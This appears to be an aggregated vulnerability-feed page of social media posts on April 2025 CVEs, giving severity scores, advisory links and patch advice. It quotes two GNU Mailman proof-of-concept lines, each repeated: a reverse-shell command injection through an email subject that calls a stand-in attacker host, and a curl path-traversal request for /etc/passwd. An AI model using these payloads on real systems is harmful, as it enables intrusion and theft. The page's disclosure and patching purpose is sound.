sev:CRIT 9.2 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L
##YoutubeDLSharp is a wrapper for the command-line video downloaders youtube-dl and yt-dlp. In versions starting from 1.0.0-beta4 and prior to 1.1.2, an unsafe conversion of arguments allows the injection of malicious commands when starting yt-dlp from a command prompt running on Windows OS with the UseWindowsEncodingWorkaround value defined to true (default behavior). If a user is using built-in methods from the YoutubeDL.cs file, the value is true by default and a user cannot disable it from these methods. This issue has been patched in version 1.1.2.
updated 2025-04-24T18:32:12
2 posts
Heard of Rack, Ruby, or Infodraw lately? Well, some nasty Path Traversal and Log Manipulation bugs are doing the rounds again, and they're definitely something to watch out for.
First up, Rack's got a vulnerability in `Rack::Static` (that's CVE-2025-27610). Basically, it could let unwanted guests wander through directories where they have no business being. You *really* need to get that updated ASAP. Alternatively, if it works for your setup, just ditch `Rack::Static` altogether.
Then there's Infodraw MRS (CVE-2025-43928), and this one's a kicker: still *no* official patch available! 😬 Since this impacts video surveillance systems, your best bets for now involve taking affected systems offline if possible. If not, sticking them safely behind a VPN or locking things down tight with an IP whitelist should be top priorities.
It's worth remembering, automated scans often breeze right past issues like these. That's where manual testing truly shines – it's absolutely worth its weight in gold here! ☝️
So, what about you? Ever run into headaches with similar vulnerabilities? How are you keeping your own systems buttoned up against these kinds of threats? Let's talk!
##../ in LEA shit? Huh.
h/t @varbin
https://mint-secure.de/path-traversal-vulnerability-in-surveillance-software/
https://cfp.eh22.easterhegg.eu/eh22/talk/9UDXSE/
sev:MED 5.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
But the reporter disagrees, which seems to be a theme lately. They claim it should be: sev:HIGH 7.2 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
##In Infodraw Media Relay Service (MRS) 7.1.0.0, the MRS web server (on port 12654) allows reading arbitrary files via ../ directory traversal in the username field. Reading ServerParameters.xml may reveal administrator credentials in cleartext or with MD5 hashing.
updated 2025-04-24T18:32:10
1 posts
updated 2025-04-24T16:36:11
1 posts
Another Apache vuln, this time in HttpClient.
https://lists.apache.org/thread/55xhs40ncqv97qvoocok44995xp5kqn8
##A bug in PSL validation logic in Apache HttpClient 5.4.x disables domain checks, affecting cookie management and host name verification. Discovered by the Apache HttpClient team. Fixed in the 5.4.3 release.
updated 2025-04-24T16:22:37.117000
3 posts
2 repos
ICYMI this weekend:
Command intention via email subject in GNU Mailman as shipped in cPanel. Note the difference of CVSS metrics between the original disclosure and the CNA (MITRE).
https://github.com/0NYX-MY7H/CVE-2025-43920
Per original disclosure (it was updated yesterday to reflect the published CVSS): sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N
GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attackers to execute arbitrary OS commands via shell metacharacters in an email Subject line.
PoC: Subject: ;bash -i >& /dev/tcp/ATTACKERIP/4444 0>&1
https://nvd.nist.gov/vuln/detail/CVE-2025-43920
There was also a nice ../ to go with it:
https://github.com/0NYX-MY7H/CVE-2025-43919
Per original disclosure (it was updated yesterday to reflect the published CVSS): sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N
GNU Mailman 2.1.39, as bundled with cPanel and WHM, contains a critical directory traversal vulnerability in the /mailman/private/mailman endpoint. Unauthenticated attackers can exploit this flaw to read arbitrary files on the server, such as /etc/passwd or Mailman configuration files, due to insufficient input validation in the private.py CGI script. This vulnerability poses significant risks for information disclosure and can facilitate further attacks when combined with other exploits.
PoC: curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." http://target/mailman/private/mailman
https://nvd.nist.gov/vuln/detail/CVE-2025-43919
There's also an "Unauthorized Mailing List Creation in GNU Mailman 2.1.39":
https://github.com/0NYX-MY7H/CVE-2025-43921
If I ran cPanel with Mailman, looking at the advisories themselves, I would treat it with the original CVSS scores in mind rather than the ones provided by MITRE here.
##Well if that command injection wasn't enough for you, how about a nice sev:CRIT ../ to go with it? Happy Easter.
https://github.com/0NYX-MY7H/CVE-2025-43919
There's also apparently an "Unauthorized Mailing List Creation in GNU Mailman 2.1.39" but the README on that one appears to be the one for the ../ so I don't have any details.
https://github.com/0NYX-MY7H/CVE-2025-43921
Edit to add the PoC: curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." http://target/mailman/private/mailman
Command intention via email subject in GNU Mailman. lol. lmao. It's interesting to see the difference of CVSS metrics between the disclosure and the CNA (MITRE).
https://github.com/0NYX-MY7H/CVE-2025-43920
Per discloser: sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N
GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attackers to execute arbitrary OS commands via shell metacharacters in an email Subject line.
https://nvd.nist.gov/vuln/detail/CVE-2025-43920
There are a couple more in Mailman while we're here:
##updated 2025-04-24T16:20:36.953000
2 posts
1 repos
##updated 2025-04-24T16:16:59.597000
3 posts
1 repos
##updated 2025-04-24T16:03:58
1 posts
DoS in tRPC.
https://github.com/trpc/trpc/security/advisories/GHSA-pj3v-9cm8-gvj8
sev:HIGH 8.7 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
##tRPC allows users to build & consume fully typesafe APIs without schemas or code generation. In versions starting from 11.0.0 to before 11.1.1, an unhandled error is thrown when validating invalid connectionParams which crashes a tRPC WebSocket server. This allows any unauthenticated user to crash a tRPC 11 WebSocket server. Any tRPC 11 server with WebSocket enabled with a createContext method set is vulnerable. This issue has been patched in version 11.1.1.
updated 2025-04-24T15:31:46
1 posts
LPE and DoS in Acronis Cyber Protect Cloud Agent (Windows).
https://security-advisory.acronis.com/advisories/SEC-8035
sev:MED 6.7 - CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H
Local privilege escalation due to insecure folder permissions. The following products are affected: Acronis Cyber Protect Cloud Agent (Windows) before build 39904.
https://nvd.nist.gov/vuln/detail/CVE-2025-30408
https://security-advisory.acronis.com/advisories/SEC-8148
sev:MED 5.5 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
##Denial of service due to allocation of resources without limits. The following products are affected: Acronis Cyber Protect Cloud Agent (Windows) before build 39904.
updated 2025-04-24T15:31:44
1 posts
I'm tired of soup, but this one is kind of fun.
##A flaw was found in libsoup. When libsoup clients encounter an HTTP redirect, they mistakenly send the HTTP Authorization header to the new host that the redirection points to. This allows the new host to impersonate the user to the original host that issued the redirect.
updated 2025-04-24T15:31:44
1 posts
updated 2025-04-24T12:31:35
1 posts
This SQLi in Centreon Web is from a month ago but the CVE was published today.
sev:HIGH 7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
##Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Centreon centreon-web (User configuration form modules) allows SQL Injection.
A user with high privileges is able to become administrator by intercepting the contact form request and altering its payload.
This issue affects Centreon: from 22.10.0 before 22.10.28, from 23.04.0 before 23.04.25, from 23.10.0 before 23.10.20, from 24.04.0 before 24.04.10, from 24.10.0 before 24.10.4.
updated 2025-04-24T09:30:40
1 posts
GitLab releases security patches for multiple Vulnerabilities
GitLab has released security updates addressing five vulnerabilities in its Community and Enterprise Editions, including three high-severity cross-site scripting and header injection flaws in the Maven Dependency Proxy (CVE-2025-1763, CVE-2025-2443, CVE-2025-1908), a denial of service vulnerability in issue preview functionality (CVE-2025-0639), and an information disclosure issue allowing unauthorized access to branch names (CVE-2024-12244). Patched versions are 17.11.1, 17.10.5, and 17.9.7.
**If you are running self-hosted GitLab Community Edition (CE) or Enterprise Edition (EE), plan a quick patch cycle. While none of the flaws are scored as critical, the nature of a GitLab server is to be visible to many users, probably on the internet. So someone will probably find an exploit scenario given enough time and an unpatched server.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/gitlab-releases-security-patches-for-multiple-vulnerabilities-9-a-u-d-v/gD2P6Ple2L
updated 2025-04-24T09:30:40
1 posts
updated 2025-04-24T09:30:40
1 posts
updated 2025-04-24T09:30:40
1 posts
Hardcoded keys in PHYSEC devices strike again.
https://jvn.jp/en/jp/JVN84627857/
sev:MED 6.8 - CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
##Use of hard-coded cryptographic key vulnerability in i-PRO Configuration Tool affects the network system for i-PRO Co., Ltd. surveillance cameras and recorders. This vulnerability allows a local authenticated attacker to use the authentication information from the last connected surveillance cameras and recorders.
updated 2025-04-24T06:30:31
4 posts
Authenticated Remote Code Execution on USG FLEX H Series (CVE-2025-1731 / CVE-2025-1732) https://0xdeadc0de.xyz/blog/cve-2025-1731_cve-2025-1732
##@Dio9sys @da_667 Adding this link to the Zyxel vuln above: https://security.humanativaspa.it/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731/
##Local privilege escalation on Zyxel USG FLEX H Series (CVE-2025-1731) https://security.humanativaspa.it/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731/
##Local privilege escalation on Zyxel USG FLEX H Series (CVE-2025-1731)
“So we wait, this is our […]
🔗️ [Humanativaspa] https://link.is.it/ubmq0d
##updated 2025-04-24T03:31:38
1 posts
This is one of those CVEs that I think the score is higher than the actual risk to most orgs but IDK, we all have different use cases and configurations.
sev:HIGH 8.8 - CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
##Brocade Fabric OS versions starting with 9.1.0 have root access removed, however, a local user with admin privilege can potentially execute arbitrary code with full root privileges on Fabric OS versions 9.1.0 through 9.1.1d6.
updated 2025-04-24T03:31:38
1 posts
Here's an industrial networking vuln for @Dio9sys and @da_667 and whoever.
sev:MED 5.9 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
##Westermo WeOS 5 through 5.23.0 allows a reboot via a malformed ESP packet.
updated 2025-04-23T21:30:42
1 posts
SonicWALL SSLVPN DoS.
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0009
sev:HIGH 7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
##A Null Pointer Dereference vulnerability in the SonicOS SSLVPN Virtual office interface allows a remote, unauthenticated attacker to crash the firewall, potentially leading to a Denial-of-Service (DoS) condition.
updated 2025-04-23T19:15:38
1 posts
SQLi in XWiki.
https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-f69v-xrj8-rhxf
sev:CRIT 9.3 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
##XWiki is a generic wiki platform. In versions starting from 1.8 and prior to 15.10.16, 16.4.6, and 16.10.1, it is possible for a remote unauthenticated user to escape from the HQL execution context and perform a blind SQL injection to execute arbitrary SQL statements on the database backend, including when "Prevent unregistered users from viewing pages, regardless of the page rights" and "Prevent unregistered users from editing pages, regardless of the page rights" options are enabled. Depending on the used database backend, the attacker may be able to not only obtain confidential information such as password hashes from the database, but also execute UPDATE/INSERT/DELETE queries. This issue has been patched in versions 16.10.1, 16.4.6 and 15.10.16. There is no known workaround, other than upgrading XWiki.
updated 2025-04-23T18:31:07
1 posts
updated 2025-04-23T18:31:00
1 posts
Arista NG Firewall XSS -> RCE.
https://www.zerodayinitiative.com/advisories/ZDI-25-181/
sev:HIGH 8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
##Arista NG Firewall User-Agent Cross-Site Scripting Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Arista NG Firewall. Minimal user interaction is required to exploit this vulnerability. The specific flaw exists within the processing of the User-Agent HTTP header. The issue results from the lack of proper validation of user-supplied data, which can lead to the injection of an arbitrary script. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-24407.
updated 2025-04-23T15:32:02
1 posts
This is unlikely to impact anyone, but it's a CVE for Cray OS. In 2025. I like it.
https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbcr04838en_us
sev:MED 5.1 - CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
##A vulnerability in the kernel of the Cray Operating System (COS) could allow an attacker to perform a local Denial of Service (DoS) attack.
updated 2025-04-23T14:08:13.383000
1 posts
HTTP request smuggling in OpenResty lua-nginx-module. But even if you don't care about that, check out the blog post (with PoC). It has a cat that chases the cursor around the screen and I love it so much.
##updated 2025-04-23T14:08:13.383000
1 posts
Heads-up if you or your target run IBM Hardware Management Console.
https://www.ibm.com/support/pages/node/7231507
sev:CRIT 9.3 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
IBM Hardware Management Console - Power Systems V10.2.1030.0 and V10.3.1050.0 could allow a local user to execute commands locally due to improper validation of libraries of an untrusted source.
https://nvd.nist.gov/vuln/detail/CVE-2025-1950
https://www.ibm.com/support/pages/node/7231389
sev:HIGH 8.4 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
##IBM Hardware Management Console - Power Systems V10.2.1030.0 and V10.3.1050.0 could allow a local user to execute commands as a privileged user due to execution of commands with unnecessary privileges.
updated 2025-04-23T14:08:13.383000
1 posts
Hey @Dio9sys and @da_667, y'all like sev:CRIT 9.8 vulns in cameras?
https://github.com/Yasha-ops/RCE-YiIOT
##updated 2025-04-23T14:08:13.383000
1 posts
##updated 2025-04-23T12:31:31
2 posts
📊⚠️ Data in danger!
We found an XSS vulnerability in Grafana with the help of SonarQube. Learn about the details in our latest blog post:
##Some of y'all use Grafana, right?
https://grafana.com/security/security-advisories/cve-2025-2703
sev:MED 6.8 - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L
##The built-in XY Chart plugin is vulnerable to a DOM XSS vulnerability.
A user with Editor permissions is able to modify such a panel in order to make it execute arbitrary JavaScript.
updated 2025-04-23T09:33:37
1 posts
Ooh, more CODESYS.
https://certvde.com/en/advisories/VDE-2025-027/
sev:MED 5.3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
##An unauthenticated remote attacker can bypass the user management in CODESYS Visualization and read visualization template files or static elements by means of forced browsing.
updated 2025-04-23T06:31:26
1 posts
A couple CVEs in Axis Camera Station Pro.
https://www.axis.com/dam/public/e4/2e/b2/cve-2025-1056pdf-en-US-479106.pdf
sev:MED 6.1 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H
Gee-netics, a member of the AXIS Camera Station Pro Bug Bounty Program, has identified an issue with a specific file that the server is using. A non-admin user can modify this file to either create files or change the content of files in an admin-protected location.
Axis has released a patched version for the highlighted flaw. Please refer to the Axis security advisory for more information and a solution.
https://nvd.nist.gov/vuln/detail/CVE-2025-1056
https://www.axis.com/dam/public/9d/fe/3f/cve-2025-0926pdf-en-US-479105.pdf
sev:MED 5.9 - CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:H
##Gee-netics, a member of the AXIS Camera Station Pro Bug Bounty Program, has found that it is possible for a non-admin user to remove system files, causing a boot loop, by redirecting a file deletion when recording video.
Axis has released a patched version for the highlighted flaw. Please refer to the Axis security advisory for more information and a solution.
updated 2025-04-23T06:31:26
1 posts
updated 2025-04-23T03:30:35
1 posts
While digging into some #Fortinet vulnerabilities, I discovered a set of CVEs that were rejected for being unused.
I'm wondering how this is actually helping vulnerability management. Does this mean those will never be used? Or something else?
##updated 2025-04-23T03:30:30
1 posts
Synology again.
https://www.synology.com/en-global/security/advisory/Synology_SA_25_03
sev:HIGH 7.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Missing authorization vulnerability in synocopy in Synology DiskStation Manager (DSM) before 7.1.1-42962-8, 7.2.1-69057-7 and 7.2.2-72806-3 allows remote attackers to read arbitrary files via unspecified vectors.
I assume "unspecified vectors" is code for "basic shit we're too embarrassed to disclose."
##updated 2025-04-22T23:53:56
1 posts
1 repos
Go hack cryptocurrency shit.
https://github.com/XRPLF/xrpl.js/security/advisories/GHSA-33qr-m49q-rxfx
sev:CRIT 9.3 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
##xrpl.js is a JavaScript/TypeScript API for interacting with the XRP Ledger in Node.js and the browser. Versions 4.2.1, 4.2.2, 4.2.3, and 4.2.4 of xrpl.js were compromised and contained malicious code designed to exfiltrate private keys. Version 2.14.2 is also malicious, though it is less likely to lead to exploitation as it is not compatible with other 2.x versions. Anyone who used one of these versions should stop immediately and rotate any private keys or secrets used with affected systems. Users of xrpl.js should upgrade to version 4.2.5 or 2.14.3 to receive a patch. To secure funds, think carefully about whether any keys may have been compromised by this supply chain attack, and mitigate by sending funds to secure wallets, and/or rotating keys. If any account's master key is potentially compromised, disable the key.
updated 2025-04-22T18:32:18
13 posts
2 repos
https://github.com/tinkerlev/commvault-cve2025-34028-check
https://github.com/watchtowrlabs/watchTowr-vs-Commvault-PreAuth-RCE-CVE-2025-34028
Arctic Wolf, from yesterday: CVE-2025-34028: PoC Released for Critical RCE Vulnerability in Commvault Command Center https://arcticwolf.com/resources/blog/cve-2025-34028/ #cybersecurity #infosec
##Critical Commvault Flaw Rated 10/10: CSA Urges Immediate Patching https://thecyberexpress.com/commvault-vulnerability-cve-2025-34028/ #CommonVulnerabilityScoringSystem #CommvaultVulnerability #TheCyberExpressNews #Vulnerabilities #TheCyberExpress #FirewallDaily #CVE202534028 #CyberNews #CSA
##CVE-2025-34028, a maximum-severity #RCE #vulnerability in the Command Center, poses a severe risk to impacted instances and may result in a full system compromise. Detect exploitation attempts with #Sigma rules from SOC Prime Platform.
https://socprime.com/blog/detect-cve-2025-34028-exploitation/?utm_source=mastodon&utm_medium=social&utm_campaign=latest-threats&utm_content=blog-post
Critical vulnerability reported in Commvault Command Center
A critical unauthenticated remote code execution vulnerability (CVE-2025-34028) in Commvault's Command Center allows attackers to force vulnerable systems to download, unzip, and execute malicious code, leading to complete system compromise. The flaw affects Commvault Command Center Innovation Release versions 11.38.0-11.38.19 on both Windows and Linux.
**If you are using Commvault Command Center Innovation Release versions 11.38.0 to 11.38.19, patch IMMEDIATELY. Naturally, make sure the system is isolated from the internet and accessible only from trusted networks. But even with isolation, someone will find your Commvault eventually - through phishing or malware. So don't delay - patch.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-vulnerability-reported-in-commvault-command-center-5-w-t-6-u/gD2P6Ple2L
Commvault Command Center Path Traversal Vulnerability (CVE-2025-34028) https://fortiguard.fortinet.com/threat-signal-report/6081
##CVE-2025-34028 Detection: A Maximum-Severity Vulnerability in the Commvault Command Center Enables RCE – Source: socprime.com https://ciso2ciso.com/cve-2025-34028-detection-a-maximum-severity-vulnerability-in-the-commvault-command-center-enables-rce-source-socprime-com/ #rssfeedpostgeneratorecho #CyberSecurityNews #CVE-2025-34028 #Latestthreats #Vulnerability #socprimecom #socprime #Blog #CVE #rce
##New.
WatchTower: Fire In The Hole, We’re Breaching The Vault - Commvault Remote Code Execution (CVE-2025-34028) https://labs.watchtowr.com/fire-in-the-hole-were-breaching-the-vault-commvault-remote-code-execution-cve-2025-34028/
More:
Infosecurity-Magazine: Highest-Risk Security Flaw Found in Commvault Backup Solutions https://www.infosecurity-magazine.com/news/critical-vulnerability-commvault/ #cybersecurity #Infosec
##Critical Commvault RCE vulnerability fixed, PoC available (CVE-2025-34028) https://www.helpnetsecurity.com/2025/04/24/critical-commvault-rce-vulnerability-fixed-poc-available-cve-2025-34028/ #dataprotection #vulnerability #Don'tmiss #Commvault #WatchTowr #Hotstuff #backup #News #PoC
##Yet another good write-up by watchTowr Labs. This time it was with Commvault. So patch it if you have it, hack it if you don't. And vendors: Take note of the communication and turnaround time in here.
Edit to fix a dumb typo.
##Whoa, that Commvault SSRF to RCE vulnerability is *ugly*! 😬 We're talking CVE-2025-34028, slapped with a 9.0 CVSS score. Yeah, that's definitely setting off all the alarm bells!
Here's the lowdown: An SSRF vulnerability in "deployWebpackage.do" isn't being filtered properly. What does that mean? Attackers can just upload a ZIP file containing a JSP payload, and *boom* – they get remote code execution. It's a stark reminder that backup systems, unfortunately, are often prime targets precisely because they get overlooked.
So, listen up: If you're running Commvault Command Center versions anywhere from 11.38.0 up to 11.38.19, you need to patch immediately. Get yourself onto version 11.38.20 or 11.38.25 right away! And while you're at it, take a good look at your configuration settings. Good news is, watchTowr Labs has put out a detection tool – definitely make use of that!
Just a friendly reminder on best practices, too: Your backup systems absolutely belong in their own, separate network segment. Crucially, regular penetration tests are a must; don't just rely on automated scans, they simply won't cut it for stuff like this. That's just how it is. 🤷
How about you? Got Commvault deployed? Have you already checked your setup against this vulnerability? What kind of hardening measures do you have in place for your backup infrastructure? Drop your thoughts below! 👇
##Fire In The Hole, We’re Breaching The Vault - Commvault Remote Code Execution (CVE-2025-34028) - watchTowr Labs https://labs.watchtowr.com/fire-in-the-hole-were-breaching-the-vault-commvault-remote-code-execution-cve-2025-34028/
##It feels like it's been a while since we've had a perfect 10 ../ and I'm glad we have another one to celebrate. 🥳
https://documentation.commvault.com/securityadvisories/CV_2025_04_1.html
sev:CRIT 10.0 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H
A path traversal vulnerability in Commvault Command Center Innovation Release allows an unauthenticated actor to upload ZIP files, which, when expanded by the target server, result in Remote Code Execution.
https://nvd.nist.gov/vuln/detail/CVE-2025-34028
Edit for dumb typo.
##updated 2025-04-22T15:31:59
2 posts
Authentication bypass vulnerability reported in HPE Performance Cluster Manager (HPCM)
Authentication bypass vulnerability in HPE Performance Cluster Manager (CVE-2025-27086, CVSS 8.1) allows attackers to exploit Remote Method Invocation in the GUI component to gain unauthorized privileged access to affected systems (version 1.12 and earlier). HPE is recommending immediate upgrade to version 1.13 or implementing a temporary mitigation - disabling the vulnerable RMI service.
**If you are running HPE Clusters and are using HPE Performance Cluster Manager, time to patch it ASAP. Although the flaw is not scored as critical, an authentication bypass to the Cluster Manager can be a nasty vector of attack. Naturally, make sure it's only accessible from isolated and trusted networks. Then patch.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/authentication-bypass-vulnerability-reported-in-hpe-performance-cluster-manager-hpcm-n-p-l-d-c/gD2P6Ple2L
Remote auth bypass in HPE Performance Cluster Manager.
https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbcr04842en_us
sev:HIGH 8.1 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
##Vulnerability in Hewlett Packard Enterprise HPE Performance Cluster Manager (HPCM). This issue affects HPE Performance Cluster Manager (HPCM): through 1.12.
updated 2025-04-22T15:30:58
2 posts
Multiple vulnerabilities reported in IBM Hardware Management Console
IBM has patched multiple security vulnerabilities in its Power Hardware Management Console (HMC), including a critical flaw (CVE-2025-1950, CVSS 9.3) that allows local users to execute commands with elevated privileges due to improper validation.
**First, make sure your IBM Hardware Management Console (HMC) is isolated and accessible only from trusted networks and trusted personnel. Also check whether you are running vulnerable versions (V10.2.1030.0 and V10.3.1050.0). If you are, plan a patch cycle, because any isolation will eventually be breached.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/multiple-vulnerabilities-reported-in-ibm-hardware-management-console-n-n-l-r-j/gD2P6Ple2L
Heads-up if you or your target run IBM Hardware Management Console.
https://www.ibm.com/support/pages/node/7231507
sev:CRIT 9.3 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
IBM Hardware Management Console - Power Systems V10.2.1030.0 and V10.3.1050.0 could allow a local user to execute commands locally due to improper validation of libraries of an untrusted source.
https://nvd.nist.gov/vuln/detail/CVE-2025-1950
https://www.ibm.com/support/pages/node/7231389
sev:HIGH 8.4 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
##IBM Hardware Management Console - Power Systems V10.2.1030.0 and V10.3.1050.0 could allow a local user to execute commands as a privileged user due to execution of commands with unnecessary privileges.
updated 2025-04-22T03:30:32
1 posts
Authenticated Remote Code Execution on USG FLEX H Series (CVE-2025-1731 / CVE-2025-1732) https://0xdeadc0de.xyz/blog/cve-2025-1731_cve-2025-1732
##updated 2025-04-21T21:55:34
1 posts
I don't know what systems use GoBGP, but if it's you or your targets, you might be interested in these. It appears they were fixed in version 3.35.0 which released on 28 February.
https://nvd.nist.gov/vuln/detail/CVE-2025-43970
https://nvd.nist.gov/vuln/detail/CVE-2025-43971
##updated 2025-04-21T21:55:26
1 posts
I don't know what systems use GoBGP, but if it's you or your targets, you might be interested in these. It appears they were fixed in version 3.35.0 which released on 28 February.
https://nvd.nist.gov/vuln/detail/CVE-2025-43970
https://nvd.nist.gov/vuln/detail/CVE-2025-43971
##updated 2025-04-21T21:55:19
1 posts
I don't know what systems use GoBGP, but if it's you or your targets, you might be interested in these. It appears they were fixed in version 3.35.0 which released on 28 February.
https://nvd.nist.gov/vuln/detail/CVE-2025-43970
https://nvd.nist.gov/vuln/detail/CVE-2025-43971
##updated 2025-04-21T17:15:24.117000
1 posts
Preauth code exec in an IAM platform sounds fun.
https://bookstack.soffid.com/books/security-advisories/page/cve-2025-32408
sev:HIGH 8.5 - CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
##In Soffid Console 3.5.38 before 3.5.39, necessary checks were not applied to some Java objects. A malicious agent could possibly execute arbitrary code in the Sync Server and compromise security.
updated 2025-04-21T14:23:45.950000
1 posts
This is an interesting vuln in Sonos API.
https://github.com/larlarua/vulnerability-reports/blob/main/CVE-2025-43916/detail.md
sev:LOW 3.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:L/A:N
Sonos api.sonos.com through 2025-04-21, when the /login/v3/oauth endpoint is used, accepts a redirect_uri containing userinfo in the authority component, which is not consistent with RFC 6819 section 5.2.3.5. An authorization code may be sent to an attacker-controlled destination. This might have further implications in conjunction with "Decompiling the app revealed a hardcoded secret."
https://nvd.nist.gov/vuln/detail/CVE-2025-43916
What's interesting to me is in the description:
This might have further implications in conjunction with "Decompiling the app revealed a hardcoded secret."
A quick search for that string only returned this CVE so I don't know if it's a pending CVE or what but it might be worth watching for if you play around with Sonos things.
##updated 2025-04-21T14:23:45.950000
1 posts
I don't know what systems use GoBGP, but if it's you or your targets, you might be interested in these. It appears they were fixed in version 3.35.0 which released on 28 February.
https://nvd.nist.gov/vuln/detail/CVE-2025-43970
https://nvd.nist.gov/vuln/detail/CVE-2025-43971
##updated 2025-04-20T00:31:48
1 posts
CVE published for that ssl dot com oopsie.
https://bugzilla.mozilla.org/show_bug.cgi?id=1961406
##SSL.com before 2025-04-19, when domain validation method 3.2.2.4.14 is used, processes certificate requests such that a trusted TLS certificate may be issued for the domain name of a requester's email address, even when the requester does not otherwise establish administrative control of that domain.
updated 2025-04-19T15:30:28
1 posts
What's that, @Dio9sys and @da_667 ? You want more Tenda? How about a couple sev:CRIT ones mixed in?
https://github.com/02Tn/vul/issues
##updated 2025-04-19T15:30:23
1 posts
What's that, @Dio9sys and @da_667 ? You want more Tenda? How about a couple sev:CRIT ones mixed in?
https://github.com/02Tn/vul/issues
##updated 2025-04-18T18:34:25
2 posts
Critical remote code execution flaw reported in PyTorch Framework
The PyTorch machine learning framework contains a critical Remote Code Execution vulnerability (CVE-2025-32434, CVSS 9.3) affecting versions up to 2.5.1, which allows attackers to bypass the `weights_only=True` protection parameter when loading models, potentially executing arbitrary code.
**If you are using PyTorch, especially for loading third party potentially unsafe models, update your PyTorch to the latest version. Alternatively, find other ways to load models because weights_only=True parameter in the torch.load() is not safe now.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-remote-code-execution-flaw-reported-in-pytorch-framework-q-d-g-r-7/gD2P6Ple2L
Hackers Can Now Exploit AI Models via PyTorch – Critical Bug Found https://thecyberexpress.com/pytorch-vulnerability-cve-2025-32434/ #PyTorchVulnerability #TheCyberExpressNews #Vulnerabilities #TheCyberExpress #FirewallDaily #CVE202532434 #MLsecurity #CyberNews #AImodels
##updated 2025-04-18T15:31:44
2 posts
Urgent security alert for Active! mail users! A critical vulnerability (CVE-2025-42599) was exploited in zero-day attacks for over 8 months. Find out if you're affected and what steps to take now. Don't wait!
#SecurityLand #BreachBreakdown #ActiveMail #Security #ZeroDay #Cybersecurity #Vulnerability
##Active! Mail remote code execution flaw actively exploited
Japanese web-based email client Active! Mail contains a critical stack-based buffer overflow vulnerability (CVE-2025-42599, CVSS 9.8) that allows unauthenticated attackers to execute arbitrary code remotely. The flaw is currently being actively exploited against Japanese organizations impacting approximately 11 million accounts, prompting Qualitia to release version 6.60.06008562 as an urgent security patch.
**If you are running Active! Mail webmail based service, disable it immediately and start patching. Because hackers are actively attacking it. You can try to mitigate the issue by blocking multipart/form-data headers, but that's not really a fix. Better to disable it fully, patch, then reactivate the service.**
#cybersecurity #infosec #attack #activeexploit
